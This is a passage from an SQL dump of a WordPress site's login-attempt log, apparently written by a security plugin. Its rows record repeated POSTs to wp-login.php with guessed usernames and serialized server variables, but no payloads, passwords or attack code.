10 07:43:08','2025-05-11 10:08:13'),(95193,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64382\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746843186.8263681;s:12:\"REQUEST_TIME\";i:1746843186;}}','35.154.1.88',1,'2025-05-10 07:43:08','2025-05-11 10:08:13'),(95194,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"64379\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746843186.8262711;s:12:\"REQUEST_TIME\";i:1746843186;}}','35.154.1.88',1,'2025-05-10 07:43:08','2025-05-11 10:08:13'),(95195,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"121\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54569\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"121\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746843914.4801049;s:12:\"REQUEST_TIME\";i:1746843914;}}','35.154.1.88',1,'2025-05-10 07:55:17','2025-05-11 10:08:13'),(95196,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"107\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54571\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"107\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746843914.481025;s:12:\"REQUEST_TIME\";i:1746843914;}}','35.154.1.88',1,'2025-05-10 07:55:17','2025-05-11 10:08:13'),(95197,4,'a:2:{s:8:\"username\";s:5:\"gamma\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54573\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746843916.2836621;s:12:\"REQUEST_TIME\";i:1746843916;}}','35.154.1.88',1,'2025-05-10 07:55:18','2025-05-11 10:08:13'),(95198,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"109\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54570\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"109\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746843916.2846761;s:12:\"REQUEST_TIME\";i:1746843916;}}','35.154.1.88',1,'2025-05-10 07:55:18','2025-05-11 10:08:13'),(95199,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"54575\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746843917.3505931;s:12:\"REQUEST_TIME\";i:1746843917;}}','35.154.1.88',1,'2025-05-10 07:55:19','2025-05-11 10:08:13'),(95200,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"97\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38308\";s:11:\"REMOTE_ADDR\";s:14:\"176.126.200.33\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746844172.869077;s:12:\"REQUEST_TIME\";i:1746844172;}}','176.126.200.33',0,'2025-05-10 07:59:34','1970-01-01 00:00:00'),(95201,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"124\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52500\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"124\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746844645.67342;s:12:\"REQUEST_TIME\";i:1746844645;}}','35.154.1.88',1,'2025-05-10 08:07:27','2025-05-11 10:08:13'),(95202,2,'a:2:{s:8:\"username\";s:5:\"Alpha\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52497\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746844645.6728611;s:12:\"REQUEST_TIME\";i:1746844645;}}','35.154.1.88',1,'2025-05-10 08:07:28','2025-05-11 10:08:13'),(95203,5,'a:2:{s:8:\"username\";s:7:\"mercury\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"116\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52508\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"116\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746844647.4048631;s:12:\"REQUEST_TIME\";i:1746844647;}}','35.154.1.88',1,'2025-05-10 08:07:29','2025-05-11 10:08:13'),(95204,3,'a:2:{s:8:\"username\";s:4:\"beta\";s:6:\"server\";a:34:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"110\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:11:\"HTTP_COOKIE\";s:100:\"wp-settings-time-1=1390368100; wordpress_test_cookie=WP+Cookie+check; bdshare_firstime=1388392036818\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:15:\"HTTP_USER_AGENT\";s:11:\"Mozilla/5.0\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"52501\";s:11:\"REMOTE_ADDR\";s:11:\"35.154.1.88\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"110\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1746844647.3450971;s:12:\"REQUEST_TIME\";i:1746844647;}}','35.154.1.88',1,'2025-05-10 08:07:29','2025-05-11 